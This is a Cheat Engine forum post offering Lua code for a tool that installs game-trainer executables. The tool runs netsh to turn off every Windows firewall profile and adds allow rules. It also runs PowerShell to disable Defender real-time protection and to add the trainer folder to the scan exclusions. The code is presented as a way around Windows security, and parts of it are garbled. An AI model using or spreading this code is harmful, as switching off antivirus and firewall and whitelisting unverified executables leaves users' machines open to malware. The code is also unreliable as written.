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Safe upload tool for ".EXE" Trainer. (Windows - 32

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Grandmaster Cheater Supreme
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PostPosted: Sat Mar 13, 2021 11:18 am    Post subject: Safe upload tool for ".EXE" Trainer. (Windows - 32 Reply with quote

I think for this coding example, I should write a "Manifesto of Responsibility".

Responsibility Manifesto;

I take the legal and conscientious responsibility that may arise from the misuse of the code below and I declare that the Cheat Engine Program is not supportive of the abuse of this code.

The coding presented below is completely instructive and; I remind you that the affiliates using this code will have accepted the "Manifesto of Liability" above.

Otherwise; Cheat Engine is not responsible for what purpose you use this program.


We made many tools with Cheat Engine and Lua coding ..
* Trainers to fix game bugs. (!) Wink
*Mp3 player
* 61-key piano
* Playable games
* Useful program helpers for Windows

We also presented these tools as ".CETRAINER", which is CE's own infrastructure, and also as ".EXE" program.
However, our ".EXE" applications were blocked by constant Windows security.
We will now fix this issue with a bootstrap tool.

For the coding resource that is the subject of the "Manifesto of Liability", take a look at the Windows release;


Turn On or Off Real-time Protection for Microsoft Defender Antivirus;

Now let's synchronize this code with Lua;

Example Trainer filename; Get "SampleGameTrainer64bits.EXE or (32bits)"

local text4=[[netsh advfirewall firewall add rule name="SampleGameTrainer64bits" dir=in action=allow program= "]]..path..[[SampleGameTrainer64bits.EXE" enable=yes remoteip=,,LocalSubnet profile=domain
netsh advfirewall firewall add rule name="SampleGameTrainer64bits" dir=in action=allow program="]]..path..[[SampleGameTrainer64bits.EXE" enable=yes remoteip=,,LocalSubnet profile=private]]

If you notice, the name of Trainer is used in 4 different places in the code.
Replace them with your Trainer name.

We are still a beginner and explanations will be presented with examples.

We will use 4 buttons, what will it do;

Button 1) Windows "Firewall" and "DEF" will be turned off and on.
Button 2) To get the right Trainer, it will be understood how many bits the Windows has.
Button 3) A folder will be opened on the Desktop and will put the Trainer in the folder.
Button 4) will make the Trainer put in the Windows Safe Programs List and the Scan "to ignore" list.

if DTool1 then DTool1.destroy() end

DTool1.Position=poDesktopCenter DTool1.Width=405 DTool1.Height=200
DTool1.setLayeredAttributes(0x000100, 255, LWA_COLORKEY | LWA_ALPHA )

local TPnl1=createPanel(DTool1) TPnl1.Height=200 TPnl1.Width=405
TPnl1.Left=0 TPnl1.Top=0 TPnl1.color=0x000100 TPnl1.BevelWidth=4

local TDesc1=createPanel(TPnl1)
TDesc1.Width=285 TDesc1.Height=32 TDesc1.Left=60  TDesc1.Top=18
TDesc1.Font.Size=12 TDesc1.Font.Style="fsBold" TDesc1.OptimalFill=true
TDesc1.color=16776960 TDesc1.BevelWidth=4 TDesc1.BevelColor=16711744
TDesc1.caption="Trainer Download Tool  V1.0"
TDesc1.OnMouseDown = function() DTool1.DragNow() end

local TBits1=createPanel(TPnl1)
TBits1.Width=165 TBits1.Height=50 TBits1.Left=120  TBits1.Top=65
TBits1.Font.Size=17 TBits1.Font.Style="fsBold" TBits1.OptimalFill=true
TBits1.color=16776960 TBits1.caption="Win Bits?"
TBits1.BevelWidth=4 TBits1.BevelColor=16711744
TBits1.OnMouseDown = function() DTool1.DragNow() end

local TPnl2=createPanel(TPnl1)
TPnl2.Width=177 TPnl2.Height=23 TPnl2.Left=18  TPnl2.Top=130
TPnl2.Font.Size=10 TPnl2.OptimalFill=true
TPnl2.caption="Close DEF"

local TPnl3=createPanel(TPnl1)
TPnl3.Width=177 TPnl3.Height=23 TPnl3.Left=210  TPnl3.Top=130
TPnl3.Font.Size=10 TPnl3.OptimalFill=true
 TPnl3.caption="Windows Bits? (32-64)"

local TPnl4=createPanel(TPnl1)
TPnl4.Width=177 TPnl4.Height=23 TPnl4.Left=18  TPnl4.Top=160
TPnl4.Font.Size=10 TPnl4.OptimalFill=true
TPnl4.caption="Download Trainer" TPnl4.Enabled=false

local TPnl5=createPanel(TPnl1)
TPnl5.Width=177 TPnl5.Height=23 TPnl5.Left=210  TPnl5.Top=160
TPnl5.Font.Size=10 TPnl5.OptimalFill=true
 TPnl5.caption="Add Trainer (DEF) List"

local TPnl6=createPanel(TPnl1)
TPnl6.Height=32 TPnl6.Width=35 TPnl6.Left=18 TPnl6.Top=18
TPnl6.caption="-" TPnl6.Font.Size=34

local TPnl7=createPanel(TPnl1)
TPnl7.Height=32 TPnl7.Width=35 TPnl7.Left=352 TPnl7.Top=18
TPnl7.caption="X" TPnl7.Font.Size=19

function btnEff2(btis2) --16776960
btis2.cursor= - 21
btis2.BevelColor=16711744 end
btnEff2(TPnl2) btnEff2(TPnl3) btnEff2(TPnl4) btnEff2(TPnl5)
btnEff2(TPnl6) btnEff2(TPnl7)


TPnl6.OnClick=function() --min
DTool1.WindowState = "wsMinimized"
TPnl7.OnClick=function() --close
 return caFree()

--Create a folder for the trainer.
local sf = os.getenv("USERPROFILE").."\\Desktop"; -- or TrainerOrigin or getMainForm()
local path = (sf.."\\MyTrainerFolderName")

function pth11()
os.execute([[mkdir "]]..sf..[[\MyTrainerFolderName"]])

--Turn off Windows Defender.
local text1=[[netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set Publicprofile state off
netsh advfirewall set currentprofile state off]]

--Turn on Windows Defender.
local text2=[[netsh advfirewall set domainprofile state on
netsh advfirewall set privateprofile state on
netsh advfirewall set Publicprofile state on
netsh advfirewall set currentprofile state on]]

--Define 32-bit Trainer to Windows Firewall.
local text3=[[netsh advfirewall firewall add rule name="SampleGameTrainer32bits" dir=in action=allow program= "]]..path..[[SampleGameTrainer32bits.EXE" enable=yes remoteip=,,LocalSubnet profile=domain
netsh advfirewall firewall add rule name="SampleGameTrainer32bits" dir=in action=allow program="]]..path..[[SampleGameTrainer32bits.EXE" enable=yes remoteip=,,LocalSubnet profile=private]]

--Define 64-bit Trainer to Windows Firewall.
local text4=[[netsh advfirewall firewall add rule name="SampleGameTrainer64bits" dir=in action=allow program= "]]..path..[[SampleGameTrainer64bits.EXE" enable=yes remoteip=,,LocalSubnet profile=domain
netsh advfirewall firewall add rule name="SampleGameTrainer64bits" dir=in action=allow program="]]..path..[[SampleGameTrainer64bits.EXE" enable=yes remoteip=,,LocalSubnet profile=private]]

local ind1=1
local win1=""
local arch=""
local target1=64

TPnl2.OnClick=function() --bit
if ind1==1 then
os.execute("PowerShell Set-MpPreference -DisableRealtimeMonitoring $true") --Turn off real-time protection.
TPnl2.caption="Open  DEF"
os.execute("PowerShell Set-MpPreference -DisableRealtimeMonitoring $false")  --Turn on real-time protection.
TPnl2.caption="Close  DEF"

--Determine how many bit versions of Windows you have.
--And detect Windows or Linux distinction.

TPnl3.OnClick=function() --bit
if (os.getenv"os" or ""):match"^Windows" then
   arch = os.getenv"PROCESSOR_ARCHITECTURE"
   win1="Linux"/s /q
   arch = io.popen"uname -m":read"*a"
if (arch or ""):match"64" then
   win2="64 bit"
TBits1.caption="Win 64 bits"
   win2="32 bit"
TBits1.caption="Win 32 bits"
TPnl4.Enabled=true TPnl4.Font.Size=9
TPnl4.caption=("Download "..win2.." Trainer")

--We forgot to remind you; Include the Trainer's 32 and 64 bit files in the vehicle. (CE >> Table >> Add file)
--And remember; Check the extension after adding the Trainer. (".exe" or ".EXE")

pth11() --The folder on the desktop is made up.
 if path then
if target1==32 then
 Trainer32bits = findTableFile('SampleGameTrainer32bits.EXE').Stream
  player_path = path..'\\SampleGameTrainer32bits.EXE'
 TPnl4.caption="Down. Trainer Success!"
 Trainer64bits = findTableFile('SampleGameTrainer64bits.EXE').Stream
  player_path = path..'\\SampleGameTrainer64bits.EXE'
 Trainer64bits.saveToFile(player_path) TPnl4.caption="Down. Trainer Success!"

--It will add the Trainer to the Windows Safe Programs list and the list of folders to be ignored in virus scanning.

TPnl5.OnClick=function() --add tr
if target1==32 then
pls1=([[powershell.exe Add-MpPreference -ExclusionPath ']]..ud2..[[']])
if ud2 then sleep(400) os.execute(pls1) end
showMessage("Add Trainer Success!")
if target1==64 then
pls1=([[powershell.exe Add-MpPreference -ExclusionPath ']]..ud2..[[']])
if ud2 then sleep(400) os.execute(pls1) end
showMessage("Add Trainer Success!")

That's all of the current coding.

*Before I forget; You will present this tool with the extension ".CETRAINER".
And the user computer must have Cheat Engine.

However, anyone who uses this coding with Cheat Engine will be deemed to have accepted the "Manifesto of Liability" above.

Here is an example of CT using all coding;

(Since it contains 32 and 64 bit Trainer.exe, the tool is 14 MB in size. This may be a problem. Wink )

If this encoding helped you, don't forget to add +1 Reputation (Rep).

See you in the next coding "that works". Idea Idea Idea

Enjoy it! Cool

Hi Hitler Different Trainer forms for you!
Enthusiastic people: Always one step ahead
Do not underestimate me Master: You were a beginner in the past

Last edited by AylinCE on Mon Mar 15, 2021 2:17 am; edited 2 times in total
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Expert Cheater
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Joined: 07 May 2020
Posts: 163
Location: On The Moon

PostPosted: Sat Mar 13, 2021 3:59 pm    Post subject: Reply with quote

Cool Cool Cool
I can see you Hitler
Especially When I am On the Moon!!
You are Right now in cheat engine forum Wink
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